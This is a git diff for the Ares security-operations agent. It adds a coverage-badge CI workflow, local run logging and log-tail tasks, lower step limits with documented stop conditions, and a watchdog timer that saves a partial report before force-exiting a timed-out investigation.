diff --git a/.github/badges/coverage.svg b/.github/badges/coverage.svg
new file mode 100644
index 00000000..f9095ee3
--- /dev/null
+++ b/.github/badges/coverage.svg
@@ -0,0 +1,16 @@
+
diff --git a/.github/workflows/coverage-badge.yaml b/.github/workflows/coverage-badge.yaml
new file mode 100644
index 00000000..0f1d7211
--- /dev/null
+++ b/.github/workflows/coverage-badge.yaml
@@ -0,0 +1,49 @@
+---
+name: 📊 Coverage Badge
+
+# Runs after the "🐍 Python Tests" workflow completes for the main branch.
+on:
+ workflow_run:
+ workflows: ["🐍 Python Tests"]
+ types:
+ - completed
+ branches:
+ - main
+
+# Scopes not listed here are set to none once this key is present.
+# actions: read - needed by download-artifact to fetch an artifact from another workflow run.
+# contents: write - needed to push the regenerated badge.
+permissions:
+ actions: read
+ contents: write
+
+jobs:
+ badge:
+ name: 📊 Generate coverage badge
+ runs-on: ubuntu-latest
+ # Skip badge generation when the triggering test run did not succeed.
+ if: github.event.workflow_run.conclusion == 'success'
+
+ steps:
+ - name: Set up git repository
+ uses: actions/checkout@8e8c483db84b4bee98b60c0593521ed34d9990e8 # v6.0.1
+
+ # Fetch the coverage-report artifact uploaded by the triggering run.
+ - name: Download coverage artifact
+ uses: actions/download-artifact@fa0a91b85d4f404e444e00e005971372dc801d16 # v4.1.8
+ with:
+ name: coverage-report
+ run-id: ${{ github.event.workflow_run.id }}
+ github-token: ${{ secrets.GITHUB_TOKEN }}
+
+ - name: Set up Python
+ uses: actions/setup-python@83679a892e2d95755f2dac6acb0bfd1e9ac5d548 # v6.1.0
+ with:
+ python-version: "3.12"
+
+ - name: Generate coverage badge
+ run: |
+ pip install "genbadge[coverage]"
+ mkdir -p .github/badges
+ genbadge coverage -i coverage.xml -o .github/badges/coverage.svg
+
+ # A commit is created only when the staged badge differs from HEAD.
+ - name: Commit badge
+ run: |
+ git config --local user.email "github-actions[bot]@users.noreply.github.com"
+ git config --local user.name "github-actions[bot]"
+ git add .github/badges/coverage.svg
+ git diff --staged --quiet || git commit -m "Update coverage badge [skip ci]"
+ git push
diff --git a/.github/workflows/tests.yaml b/.github/workflows/tests.yaml
index 0ff24b80..9f83af99 100644
--- a/.github/workflows/tests.yaml
+++ b/.github/workflows/tests.yaml
@@ -55,4 +55,12 @@ jobs:
- name: Run tests with coverage
run: |
- pytest --cov=src --cov-report=term-missing || [ $? -eq 5 ] # Allow workflow to pass when no tests exist
+ pytest --cov=src --cov-report=xml --cov-report=term-missing || [ $? -eq 5 ] # Allow workflow to pass when no tests exist
+
+ - name: Upload coverage report
+ if: github.ref == 'refs/heads/main' && github.event_name == 'push' && matrix.python-version == '3.12'
+ uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
+ with:
+ name: coverage-report
+ path: coverage.xml
+ retention-days: 1
diff --git a/.gitignore b/.gitignore
index 6450c881..0bef9302 100644
--- a/.gitignore
+++ b/.gitignore
@@ -6,6 +6,7 @@ test-alerts/
TODO
.tool-versions
/reports/
+/logs/
# Custom parquet storage
*.parquet
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 8a47f4ed..c196b5b5 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -93,6 +93,7 @@ repos:
rev: v1.19.1
hooks:
- id: mypy
+ exclude: ^tests/
additional_dependencies:
- "types-PyYAML"
- "types-requests"
diff --git a/README.md b/README.md
index 52f373c7..093cd982 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,15 @@
# Ares - Autonomous Security Operations Agent
+
+
+
+[](https://github.com/dreadnode/python-template/actions/workflows/pre-commit.yaml)
+[](https://github.com/dreadnode/python-template/actions/workflows/renovate.yaml)
+[](https://opensource.org/licenses/Apache-2.0)
+
+
+
+
[](https://github.com/dreadnode/ares/actions/workflows/pre-commit.yaml)
[](https://opensource.org/licenses/Apache-2.0)
[](https://www.python.org/downloads/)
@@ -161,7 +171,7 @@ uv run python -m ares \
--args.model claude-sonnet-4-20250514 \
--args.grafana-url https://grafana.example.com \
--args.poll-interval 30 \
- --args.max-steps 150 \
+ --args.max-steps 30 \
--args.report-dir ./reports
# Run once and exit (process current alerts only)
@@ -176,7 +186,7 @@ Investigate a specific alert by providing it as JSON:
uv run python -m ares investigate-alert test-alerts/example-alert.json \
--args.model claude-sonnet-4-20250514 \
--args.grafana-url https://grafana.example.com \
- --args.max-steps 150
+ --args.max-steps 30
```
#### Red Team - Penetration Testing
@@ -212,7 +222,7 @@ task ares:red: TARGET=192.168.1.100
# Or via CLI
uv run python -m ares red-team 192.168.1.100 \
--args.model claude-sonnet-4-20250514 \
- --args.max-steps 150 \
+ --args.max-steps 30 \
--args.report-dir ./reports
```
@@ -229,8 +239,27 @@ bloodhound-python).
| `--args.model` | `claude-sonnet-4-20250514` | LLM model to use |
| `--args.grafana-url` | `https://grafana.dev.plundr.ai` | Grafana URL for alerts and MCP |
| `--args.poll-interval` | `30` | Seconds between alert polls |
-| `--args.max-steps` | `150` | Maximum agent steps per investigation |
+| `--args.max-steps` | `30` | Maximum LLM round trips per investigation |
| `--args.report-dir` | `./reports` | Directory for markdown reports |
+| `--args.once` | `false` | Process current alerts once and exit |
+
+**Stop Conditions:**
+
+The agent stops when **any** of these conditions are met:
+
+- `complete_investigation()` tool is called (normal completion)
+- `escalate_investigation()` tool is called (escalation to human)
+- 5 Loki/Prometheus queries executed
+- 20 total tool calls made (prevents infinite loops)
+- `max_steps` LLM round trips reached
+
+**Timeout Behavior:**
+
+The agent has multiple timeout layers:
+
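+- Hard timeout: `max_steps × 60 seconds` (1 minute per step), enforced with `asyncio.wait_for`; when it expires a partial report is written and the investigation ends with status `timeout`
+- Watchdog thread: fires 120 seconds after the hard timeout (`max_steps × 60 + 120` seconds), attempts to save a partial report, then force-exits the process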
+- When using Taskfile, defaults are 15 steps (once mode) or 50 steps (polling mode)
**Dreadnode Platform Arguments (`--dn-args.*`):**
diff --git a/Taskfile.yaml b/Taskfile.yaml
index 3c6a004b..bdfc31a2 100644
--- a/Taskfile.yaml
+++ b/Taskfile.yaml
@@ -15,8 +15,10 @@ vars:
MODEL: '{{.MODEL | default "claude-sonnet-4-20250514"}}'
GRAFANA_URL: '{{.GRAFANA_URL | default "https://grafana.dev.plundr.ai"}}'
POLL_INTERVAL: '{{.POLL_INTERVAL | default "30"}}'
- MAX_STEPS: '{{.MAX_STEPS | default "150"}}'
+ MAX_STEPS: '{{.MAX_STEPS | default "50"}}'
+ MAX_STEPS_ONCE: '{{.MAX_STEPS_ONCE | default "15"}}' # ~15 min max for once mode
REPORT_DIR: '{{.REPORT_DIR | default "./reports"}}'
+ LOG_DIR: '{{.LOG_DIR | default "./logs"}}'
DREADNODE_SERVER: '{{.DREADNODE_SERVER | default "https://platform.dev.plundr.ai/"}}'
DREADNODE_ORGANIZATION: '{{.DREADNODE_ORGANIZATION | default "ares"}}'
DREADNODE_WORKSPACE: '{{.DREADNODE_WORKSPACE | default "ares-protocol"}}'
@@ -153,13 +155,17 @@ tasks:
- task: check-aws-auth
vars:
PROFILE: '{{.PROFILE | default "infrastructure"}}'
- REGION: '{{.REGION | default "us-west-2"}}'
+ REGION: '{{.REGION | default "us-west-1"}}'
cmds:
- |
export DREADNODE_API_KEY=$(op item get "Dreadnode Dev Platform" --fields api-key --reveal)
export GRAFANA_API_KEY=$(op item get "Ares Grafana MCP" --fields grafana-token --reveal 2>/dev/null || echo "")
export ANTHROPIC_API_KEY=$(op item get "claude.ai" --fields dreadnode-api-key --reveal 2>/dev/null || echo "")
+ mkdir -p {{.LOG_DIR}}
+ LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log"
+ echo "📝 Logging to: $LOGFILE"
+
uv run python -m ares \
--args.model {{.MODEL}} \
--args.grafana-url {{.GRAFANA_URL}} \
@@ -170,7 +176,8 @@ tasks:
--dn-args.token "$DREADNODE_API_KEY" \
--dn-args.organization {{.DREADNODE_ORGANIZATION}} \
--dn-args.workspace {{.DREADNODE_WORKSPACE}} \
- --dn-args.project {{.DREADNODE_PROJECT}}
+ --dn-args.project {{.DREADNODE_PROJECT}} \
+ 2>&1 | tee -a "$LOGFILE"
ares:blue:once:
desc: Run blue team agent once and exit (uses 1Password for API keys)
@@ -178,25 +185,30 @@ tasks:
- task: check-aws-auth
vars:
PROFILE: '{{.PROFILE | default "infrastructure"}}'
- REGION: '{{.REGION | default "us-west-2"}}'
+ REGION: '{{.REGION | default "us-west-1"}}'
cmds:
- |
export DREADNODE_API_KEY=$(op item get "Dreadnode Dev Platform" --fields api-key --reveal)
export GRAFANA_API_KEY=$(op item get "Ares Grafana MCP" --fields grafana-token --reveal 2>/dev/null || echo "")
export ANTHROPIC_API_KEY=$(op item get "claude.ai" --fields dreadnode-api-key --reveal 2>/dev/null || echo "")
+ mkdir -p {{.LOG_DIR}}
+ LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log"
+ echo "📝 Logging to: $LOGFILE"
+
uv run python -m ares \
--args.model {{.MODEL}} \
--args.grafana-url {{.GRAFANA_URL}} \
--args.poll-interval {{.POLL_INTERVAL}} \
- --args.max-steps {{.MAX_STEPS}} \
+ --args.max-steps {{.MAX_STEPS_ONCE}} \
--args.report-dir {{.REPORT_DIR}} \
--args.once \
--dn-args.server {{.DREADNODE_SERVER}} \
--dn-args.token "$DREADNODE_API_KEY" \
--dn-args.organization {{.DREADNODE_ORGANIZATION}} \
--dn-args.workspace {{.DREADNODE_WORKSPACE}} \
- --dn-args.project {{.DREADNODE_PROJECT}}
+ --dn-args.project {{.DREADNODE_PROJECT}} \
+ 2>&1 | tee -a "$LOGFILE"
ares:blue:local:
desc: Run blue team agent using .env file (no 1Password)
@@ -204,7 +216,7 @@ tasks:
- task: check-aws-auth
vars:
PROFILE: '{{.PROFILE | default "infrastructure"}}'
- REGION: '{{.REGION | default "us-west-2"}}'
+ REGION: '{{.REGION | default "us-west-1"}}'
cmds:
- |
if [ ! -f .env ]; then
@@ -216,6 +228,10 @@ tasks:
. ./.env
set +a
+ mkdir -p {{.LOG_DIR}}
+ LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log"
+ echo "📝 Logging to: $LOGFILE"
+
uv run python -m ares \
--args.model {{.MODEL}} \
--args.grafana-url {{.GRAFANA_URL}} \
@@ -225,7 +241,8 @@ tasks:
--dn-args.server {{.DREADNODE_SERVER}} \
--dn-args.organization {{.DREADNODE_ORGANIZATION}} \
--dn-args.workspace {{.DREADNODE_WORKSPACE}} \
- --dn-args.project {{.DREADNODE_PROJECT}}
+ --dn-args.project {{.DREADNODE_PROJECT}} \
+ 2>&1 | tee -a "$LOGFILE"
ares:blue:local:once:
desc: Run blue team agent once and exit using .env file (no 1Password)
@@ -233,7 +250,7 @@ tasks:
- task: check-aws-auth
vars:
PROFILE: '{{.PROFILE | default "infrastructure"}}'
- REGION: '{{.REGION | default "us-west-2"}}'
+ REGION: '{{.REGION | default "us-west-1"}}'
cmds:
- |
if [ ! -f .env ]; then
@@ -245,17 +262,22 @@ tasks:
. ./.env
set +a
+ mkdir -p {{.LOG_DIR}}
+ LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log"
+ echo "📝 Logging to: $LOGFILE"
+
uv run python -m ares \
--args.model {{.MODEL}} \
--args.grafana-url {{.GRAFANA_URL}} \
--args.poll-interval {{.POLL_INTERVAL}} \
- --args.max-steps {{.MAX_STEPS}} \
+ --args.max-steps {{.MAX_STEPS_ONCE}} \
--args.report-dir {{.REPORT_DIR}} \
--args.once \
--dn-args.server {{.DREADNODE_SERVER}} \
--dn-args.organization {{.DREADNODE_ORGANIZATION}} \
--dn-args.workspace {{.DREADNODE_WORKSPACE}} \
- --dn-args.project {{.DREADNODE_PROJECT}}
+ --dn-args.project {{.DREADNODE_PROJECT}} \
+ 2>&1 | tee -a "$LOGFILE"
ares:investigate:
desc: "Investigate a specific alert from JSON file (usage: task ares:investigate ALERT=alert.json)"
@@ -270,7 +292,7 @@ tasks:
- task: check-aws-auth
vars:
PROFILE: '{{.PROFILE | default "infrastructure"}}'
- REGION: '{{.REGION | default "us-west-2"}}'
+ REGION: '{{.REGION | default "us-west-1"}}'
cmds:
- |
export DREADNODE_API_KEY=$(op item get "Dreadnode Dev Platform" --fields api-key --reveal)
@@ -280,7 +302,7 @@ tasks:
uv run python -m ares investigate-alert {{.ALERT}} \
--args.model {{.MODEL}} \
--args.grafana-url {{.GRAFANA_URL}} \
- --args.max-steps {{.MAX_STEPS}} \
+ --args.max-steps {{.MAX_STEPS_ONCE}} \
--args.report-dir {{.REPORT_DIR}} \
--dn-args.server {{.DREADNODE_SERVER}} \
--dn-args.token "$DREADNODE_API_KEY" \
@@ -408,6 +430,99 @@ tasks:
echo "✅ Reports cleaned"
fi
+ # ===========================================================================
+ # Ares Local Log Management
+ # ===========================================================================
+
+ ares:logs:list:
+ # Prints a long listing of every *.log file in LOG_DIR, or a notice when
+ # the directory is missing or contains no logs.
+ desc: List all local agent logs
+ cmds:
+ - |
+ echo "Agent Logs:"
+ echo "==========="
+ if [ -d {{.LOG_DIR}} ]; then
+ # -t sorts newest first; -h prints human-readable sizes.
+ ls -lht {{.LOG_DIR}}/*.log 2>/dev/null || echo "No logs found"
+ else
+ echo "Log directory not found: {{.LOG_DIR}}"
+ fi
+
+ ares:logs:tail:
+ # Shows the most recently modified *.log file in LOG_DIR.
+ # LINES sets how many trailing lines are printed; FOLLOW=true keeps streaming.
+ desc: "Tail the latest log file (usage: task ares:logs:tail [LINES=100] [FOLLOW=true])"
+ vars:
+ LINES: '{{.LINES | default "100"}}'
+ FOLLOW: '{{.FOLLOW | default "false"}}'
+ cmds:
+ - |
+ LATEST=$(ls -t {{.LOG_DIR}}/*.log 2>/dev/null | head -1)
+ if [ -z "$LATEST" ]; then
+ echo "No logs found in {{.LOG_DIR}}"
+ exit 1
+ fi
+
+ echo "📋 Log file: $LATEST"
+ echo "======================================================================"
+
+ # Honor LINES in follow mode too; plain `tail -f` would ignore it.
+ if [ "{{.FOLLOW}}" = "true" ]; then
+ tail -n {{.LINES}} -f "$LATEST"
+ else
+ tail -n {{.LINES}} "$LATEST"
+ fi
+
+ ares:logs:blue:
+ # Shows the most recently modified blue-*.log file in LOG_DIR.
+ # LINES sets how many trailing lines are printed; FOLLOW=true keeps streaming.
+ desc: "Tail the latest blue team log (usage: task ares:logs:blue [LINES=100] [FOLLOW=true])"
+ vars:
+ LINES: '{{.LINES | default "100"}}'
+ FOLLOW: '{{.FOLLOW | default "false"}}'
+ cmds:
+ - |
+ LATEST=$(ls -t {{.LOG_DIR}}/blue-*.log 2>/dev/null | head -1)
+ if [ -z "$LATEST" ]; then
+ echo "No blue team logs found in {{.LOG_DIR}}"
+ exit 1
+ fi
+
+ echo "📋 Blue team log: $LATEST"
+ echo "======================================================================"
+
+ # Honor LINES in follow mode too; plain `tail -f` would ignore it.
+ if [ "{{.FOLLOW}}" = "true" ]; then
+ tail -n {{.LINES}} -f "$LATEST"
+ else
+ tail -n {{.LINES}} "$LATEST"
+ fi
+
+ ares:logs:red:
+ # Shows the most recently modified red-*.log file in LOG_DIR.
+ # LINES sets how many trailing lines are printed; FOLLOW=true keeps streaming.
+ desc: "Tail the latest red team log (usage: task ares:logs:red [LINES=100] [FOLLOW=true])"
+ vars:
+ LINES: '{{.LINES | default "100"}}'
+ FOLLOW: '{{.FOLLOW | default "false"}}'
+ cmds:
+ - |
+ LATEST=$(ls -t {{.LOG_DIR}}/red-*.log 2>/dev/null | head -1)
+ if [ -z "$LATEST" ]; then
+ echo "No red team logs found in {{.LOG_DIR}}"
+ exit 1
+ fi
+
+ echo "📋 Red team log: $LATEST"
+ echo "======================================================================"
+
+ # Honor LINES in follow mode too; plain `tail -f` would ignore it.
+ if [ "{{.FOLLOW}}" = "true" ]; then
+ tail -n {{.LINES}} -f "$LATEST"
+ else
+ tail -n {{.LINES}} "$LATEST"
+ fi
+
+ ares:logs:clean:
+ # Asks for a single-key confirmation, then deletes the *.log files in LOG_DIR.
+ desc: Remove all local agent logs
+ cmds:
+ - |
+ read -p "Delete all logs in {{.LOG_DIR}}? (y/N) " -n 1 -r
+ echo
+ if [[ $REPLY =~ ^[Yy]$ ]]; then
+ # Only log files are targeted, so no recursive delete is needed.
+ rm -f {{.LOG_DIR}}/*.log
+ echo "✅ Logs cleaned"
+ fi
+
ares:version:
desc: Show Ares version information
cmds:
@@ -450,7 +565,7 @@ tasks:
internal: true
vars:
PROFILE: '{{.PROFILE | default "lab"}}'
- REGION: '{{.REGION | default "us-west-2"}}'
+ REGION: '{{.REGION | default "us-west-1"}}'
cmds:
- |
# Check if AWS CLI is installed
@@ -485,7 +600,7 @@ tasks:
vars:
TARGET: '{{.TARGET | default ""}}'
PROFILE: '{{.PROFILE | default "lab"}}'
- REGION: '{{.REGION | default "us-west-2"}}'
+ REGION: '{{.REGION | default "us-west-1"}}'
REDTEAM_PROJECT: '{{.REDTEAM_PROJECT | default "ares-redteam"}}'
preconditions:
- sh: test -n "{{.TARGET}}"
@@ -521,6 +636,10 @@ tasks:
echo "✅ Resolved to: $RESOLVED_TARGET"
fi
+ mkdir -p {{.LOG_DIR}}
+ LOGFILE="{{.LOG_DIR}}/red-$(date +%Y%m%d-%H%M%S).log"
+ echo "📝 Logging to: $LOGFILE"
+
uv run python -m ares red-team "$RESOLVED_TARGET" \
--args.model {{.MODEL}} \
--args.max-steps {{.MAX_STEPS}} \
@@ -529,7 +648,8 @@ tasks:
--dn-args.token "$DREADNODE_API_KEY" \
--dn-args.organization {{.DREADNODE_ORGANIZATION}} \
--dn-args.workspace {{.DREADNODE_WORKSPACE}} \
- --dn-args.project {{.REDTEAM_PROJECT}}
+ --dn-args.project {{.REDTEAM_PROJECT}} \
+ 2>&1 | tee -a "$LOGFILE"
ares:red:local:
desc: "Run red team agent using .env file (usage: task ares:red:local TARGET=192.168.1.100)"
@@ -550,6 +670,10 @@ tasks:
. ./.env
set +a
+ mkdir -p {{.LOG_DIR}}
+ LOGFILE="{{.LOG_DIR}}/red-$(date +%Y%m%d-%H%M%S).log"
+ echo "📝 Logging to: $LOGFILE"
+
uv run python -m ares red-team {{.TARGET}} \
--args.model {{.MODEL}} \
--args.max-steps {{.MAX_STEPS}} \
@@ -557,16 +681,17 @@ tasks:
--dn-args.server {{.DREADNODE_SERVER}} \
--dn-args.organization {{.DREADNODE_ORGANIZATION}} \
--dn-args.workspace {{.DREADNODE_WORKSPACE}} \
- --dn-args.project {{.REDTEAM_PROJECT}}
+ --dn-args.project {{.REDTEAM_PROJECT}} \
+ 2>&1 | tee -a "$LOGFILE"
ares:red:logs:
desc: "Tail red team agent logs from Kali via SSM (usage: task ares:red:logs [KALI=instance-name] [LINES=100] [FOLLOW=true])"
vars:
- KALI: '{{.KALI | default "dev-alpha-operator-range-kali"}}'
+ KALI: '{{.KALI | default "staging-alpha-operator-range-kali"}}'
LINES: '{{.LINES | default "100"}}'
FOLLOW: '{{.FOLLOW | default "false"}}'
PROFILE: '{{.PROFILE | default "lab"}}'
- REGION: '{{.REGION | default "us-west-2"}}'
+ REGION: '{{.REGION | default "us-west-1"}}'
deps:
- task: check-aws-auth
vars:
diff --git a/docs/taskfile_usage.md b/docs/taskfile_usage.md
index 9e5bf841..1b7d53f3 100644
--- a/docs/taskfile_usage.md
+++ b/docs/taskfile_usage.md
@@ -304,13 +304,39 @@ All tasks support the following configuration variables:
| `MODEL` | `claude-sonnet-4-20250514` | LLM model to use |
| `GRAFANA_URL` | `https://grafana.dev.plundr.ai` | Grafana URL for alerts |
| `POLL_INTERVAL` | `30` | Seconds between alert polls |
-| `MAX_STEPS` | `150` | Maximum agent steps per investigation |
+| `MAX_STEPS` | `50` | Maximum agent steps for polling mode (Taskfile override, code default is 30) |
+| `MAX_STEPS_ONCE` | `15` | Maximum agent steps for once/investigate modes |
| `REPORT_DIR` | `./reports` | Directory for markdown reports |
| `DREADNODE_SERVER` | `https://platform.dev.plundr.ai/` | Dreadnode platform URL |
| `DREADNODE_ORGANIZATION` | `ares` | Dreadnode organization name |
| `DREADNODE_WORKSPACE` | `ares-protocol` | Dreadnode workspace name |
| `DREADNODE_PROJECT` | `ares-soc` | Dreadnode project name |
+**Stop Conditions:**
+
+The agent will stop when **any** of these conditions are met:
+
+- Agent calls `complete_investigation()` (normal completion)
+- Agent calls `escalate_investigation()` (escalation to human)
+- 5 Loki/Prometheus queries executed
+- **20 total tool calls made** (prevents infinite loops)
+- `max_steps` LLM round trips reached
+
+**Timeout Behavior:**
+
+The agent has multiple timeout layers:
+
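+- Hard timeout: `max_steps × 60 seconds` (1 minute per step), enforced with `asyncio.wait_for`; when it expires a partial report is written and the investigation ends with status `timeout`
+- Watchdog thread: fires 120 seconds after the hard timeout (`max_steps × 60 + 120` seconds), attempts to save a partial report, then force-exits the process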
+
+| Mode | Default Steps | Max Timeout |
+| --- | --- | --- |
+| `ares:blue:once` | 15 | ~15 minutes |
+| `ares:blue:local:once` | 15 | ~15 minutes |
+| `ares:investigate` | 15 | ~15 minutes |
+| `ares:blue` (polling) | 50 | ~50 minutes per alert |
+| `ares:blue:local` (polling) | 50 | ~50 minutes per alert |
+
**Example with custom variables:**
```bash
diff --git a/pyproject.toml b/pyproject.toml
index 2db34b49..ede9da03 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -21,6 +21,7 @@ dependencies = [
"cyclopts>=4.2.0",
"loguru>=0.7.3",
"httpx>=0.28.0,<1.0.0",
+ "boto3>=1.42.25",
]
[project.optional-dependencies]
diff --git a/src/ares/agents/blue/soc_investigator.py b/src/ares/agents/blue/soc_investigator.py
index 6a4e3f16..769f9584 100644
--- a/src/ares/agents/blue/soc_investigator.py
+++ b/src/ares/agents/blue/soc_investigator.py
@@ -4,6 +4,8 @@
Main agent implementation using Dreadnode Agent SDK.
"""
+import os
+import threading
import uuid
from datetime import datetime, timedelta, timezone
from pathlib import Path
@@ -11,12 +13,76 @@
import dreadnode as dn
from loguru import logger
-from ares.core.factories.blue_factory import create_investigation_agent
-from ares.core.models import InvestigationState
+from ares.core.factories.blue_factory import create_investigation_agent, reset_query_tracking
+from ares.core.models import InvestigationState, TimelineEvent
+from ares.core.persistence import (
+ create_stored_investigation_from_state,
+ get_investigation_store,
+)
from ares.core.templates import get_template_loader
from ares.integrations.mitre import MITREAttackClient
+class InvestigationTimeoutError(Exception):
+ """Raised when investigation exceeds hard timeout."""
+
+
+class WatchdogTimer:
+ """Watchdog that generates report and forcefully exits if timeout is exceeded.
+
+ Wraps a one-shot ``threading.Timer``. If the timer fires before ``cancel()``
+ is called, the handler logs the overrun, tries to write a partial report
+ from the shared investigation state, and ends the process with
+ ``os._exit(1)``.
+ """
+
+ def __init__(
+ self,
+ timeout_seconds: int,
+ investigation_id: str,
+ state: "InvestigationState",
+ report_dir: Path,
+ ):
+ """Store the watchdog configuration; the timer is not started here.
+
+ Args:
+ timeout_seconds: Delay, in seconds, before the handler fires.
+ investigation_id: Identifier used in the timeout log messages.
+ state: Investigation state read when the timeout fires (evidence and
+ timeline counts, and the input to the partial report).
+ report_dir: Directory handed to the report generator.
+ """
+ self.timeout = timeout_seconds
+ self.investigation_id = investigation_id
+ self.state = state
+ self.report_dir = report_dir
+ self._timer: threading.Timer | None = None
+ self._cancelled = False
+
+ def _timeout_handler(self) -> None:
+ """Timer callback: log, attempt a partial report, then exit the process."""
+ # cancel() may have been called after the timer already fired; do nothing then.
+ if self._cancelled:
+ return
+
+ logger.critical(
+ f"WATCHDOG: Investigation {self.investigation_id} exceeded "
+ f"hard timeout of {self.timeout}s"
+ )
+ logger.warning(
+ f"Current state: {len(self.state.evidence)} evidence items, "
+ f"{len(self.state.timeline)} timeline events"
+ )
+
+ # Generate partial report before dying
+ # Best effort: a report failure is logged and must not prevent the exit below.
+ try:
+ from ares.reports.investigation import MarkdownReportGenerator
+
+ generator = MarkdownReportGenerator(self.report_dir)
+ report_path = generator.generate(self.state)
+ logger.warning(f"Partial report saved to: {report_path}")
+ except Exception as e:
+ logger.error(f"Failed to generate partial report: {e}")
+
+ logger.critical("Forcing exit due to timeout")
+ # os._exit ends the process immediately, without normal interpreter cleanup.
+ os._exit(1)
+
+ def start(self) -> None:
+ """Create and start the timer that will call ``_timeout_handler``."""
+ self._timer = threading.Timer(self.timeout, self._timeout_handler)
+ # Daemon thread: a pending watchdog does not keep the interpreter alive.
+ self._timer.daemon = True
+ self._timer.start()
+ logger.info(f"Watchdog started: {self.timeout}s ({self.timeout // 60}m)")
+
+ def cancel(self) -> None:
+ """Disarm the watchdog; safe to call when ``start()`` was never called."""
+ # Set the flag first so a handler that begins after this point returns early.
+ self._cancelled = True
+ if self._timer:
+ self._timer.cancel()
+ logger.debug("Watchdog cancelled")
+
+
def build_initial_prompt(alert: dict) -> str:
"""Build the initial prompt with alert context.
@@ -44,7 +110,6 @@ def build_initial_prompt(alert: dict) -> str:
if key in labels:
mitre_technique = labels[key]
break
- # Also check annotations
if not mitre_technique:
for key in ["mitre_technique", "mitre", "technique_id", "technique"]:
if key in annotations:
@@ -97,7 +162,7 @@ def __init__(
grafana_api_key: str,
mitre_client: MITREAttackClient,
report_dir: Path,
- max_steps: int = 150,
+ max_steps: int = 30,
):
self.model = model
self.grafana_url = grafana_url
@@ -109,19 +174,28 @@ def __init__(
self._mcp_tools = None
async def _ensure_mcp_connection(self) -> None:
- """Ensure MCP connection is established."""
+ """Ensure MCP connection is established (with 60s timeout)."""
+ import asyncio
+
if self._mcp_client is None:
from ares.tools.blue.grafana import connect_grafana_mcp
try:
logger.info("Connecting to Grafana MCP server...")
- self._mcp_client = await connect_grafana_mcp(
- grafana_url=self.grafana_url,
- grafana_api_key=self.grafana_api_key,
+ self._mcp_client = await asyncio.wait_for( # type: ignore[func-returns-value]
+ connect_grafana_mcp(
+ grafana_url=self.grafana_url,
+ grafana_api_key=self.grafana_api_key,
+ ),
+ timeout=60.0,
)
self._mcp_tools = self._mcp_client.tools
tool_count = len(self._mcp_tools) if self._mcp_tools else 0
logger.success(f"Grafana MCP connected ({tool_count} tools available)")
+ except asyncio.TimeoutError:
+ logger.warning("Grafana MCP connection timed out after 60s")
+ logger.warning("Continuing without MCP tools")
+ self._mcp_tools = None
except Exception as e:
logger.warning(f"Failed to connect to Grafana MCP: {e}")
logger.warning("Continuing without MCP tools")
@@ -129,10 +203,18 @@ async def _ensure_mcp_connection(self) -> None:
async def _shutdown_mcp(self) -> None:
"""Shutdown MCP connection if active."""
+ import asyncio
+
if self._mcp_client:
try:
- await self._mcp_client.__aexit__(None, None, None)
+ # Add timeout to prevent hanging on shutdown
+ await asyncio.wait_for(
+ self._mcp_client.__aexit__(None, None, None),
+ timeout=10.0,
+ )
logger.info("Grafana MCP connection closed")
+ except asyncio.TimeoutError:
+ logger.warning("MCP shutdown timed out after 10s, forcing close")
except Exception as e:
logger.warning(f"Error closing MCP connection: {e}")
finally:
@@ -158,108 +240,298 @@ async def investigate(self, alert: dict) -> dict:
- highest_pyramid_level: Highest Pyramid of Pain level reached (1-6)
Raises:
- TimeoutError: If investigation exceeds the configured timeout.
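+ InvestigationTimeoutError: If investigation exceeds the hard timeout.
+ NOTE(review): the code in this method does not raise it itself - the asyncio
+ timeout path returns a result with status "timeout" and the watchdog calls
+ os._exit(1); confirm whether a callee raises it.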
"""
investigation_id = f"inv-{uuid.uuid4().hex[:8]}"
alert_name = alert.get("labels", {}).get("alertname", "unknown")
logger.info(f"Starting investigation {investigation_id} for alert: {alert_name}")
- # Ensure MCP connection is ready
- await self._ensure_mcp_connection()
+ # Reset query tracking for this investigation
+ reset_query_tracking()
- # Create investigation state
+ # Create investigation state early so we can generate partial reports on timeout
state = InvestigationState(
investigation_id=investigation_id,
alert=alert,
)
- # Auto-extract and record MITRE technique from alert
+ # Hard timeout using watchdog thread (works even if event loop is blocked)
+ # 1 minute per step + 2 minutes buffer for setup/teardown
+ hard_timeout_seconds = (self.max_steps * 60) + 120
+ watchdog = WatchdogTimer(
+ hard_timeout_seconds,
+ investigation_id,
+ state,
+ self.report_dir,
+ )
+ watchdog.start()
+
+ try:
+ # Ensure MCP connection is ready
+ await self._ensure_mcp_connection()
+
+ # Auto-extract and record MITRE technique from alert
+ labels = alert.get("labels", {})
+ annotations = alert.get("annotations", {})
+ for key in ["mitre_technique", "mitre", "technique_id", "technique"]:
+ if labels.get(key):
+ tech_id = labels[key]
+ state.identified_techniques.add(tech_id)
+ # Resolve technique name and tactic
+ technique = self.mitre_client.get_technique(tech_id)
+ if technique:
+ state.technique_names[tech_id] = technique.name
+ state.technique_to_tactic[tech_id] = technique.tactic or "Unknown"
+ if technique.tactic:
+ state.identified_tactics.add(technique.tactic)
+ logger.info(f"Auto-recorded MITRE technique from alert: {tech_id}")
+ break
+ if annotations.get(key):
+ tech_id = annotations[key]
+ state.identified_techniques.add(tech_id)
+ # Resolve technique name and tactic
+ technique = self.mitre_client.get_technique(tech_id)
+ if technique:
+ state.technique_names[tech_id] = technique.name
+ state.technique_to_tactic[tech_id] = technique.tactic or "Unknown"
+ if technique.tactic:
+ state.identified_tactics.add(technique.tactic)
+ logger.info(f"Auto-recorded MITRE technique from alert: {tech_id}")
+ break
+
+ self._create_alert_timeline_event(state, alert)
+
+ initial_prompt = build_initial_prompt(alert)
+
+ with dn.run(tags=["soc-investigation", alert_name]):
+ dn.log_params(
+ model=self.model,
+ investigation_id=investigation_id,
+ alert_name=alert_name,
+ alert_severity=alert.get("labels", {}).get("severity", "unknown"),
+ max_steps=self.max_steps,
+ mcp_tools_available=self._mcp_tools is not None,
+ mcp_tool_count=len(self._mcp_tools) if self._mcp_tools else 0,
+ )
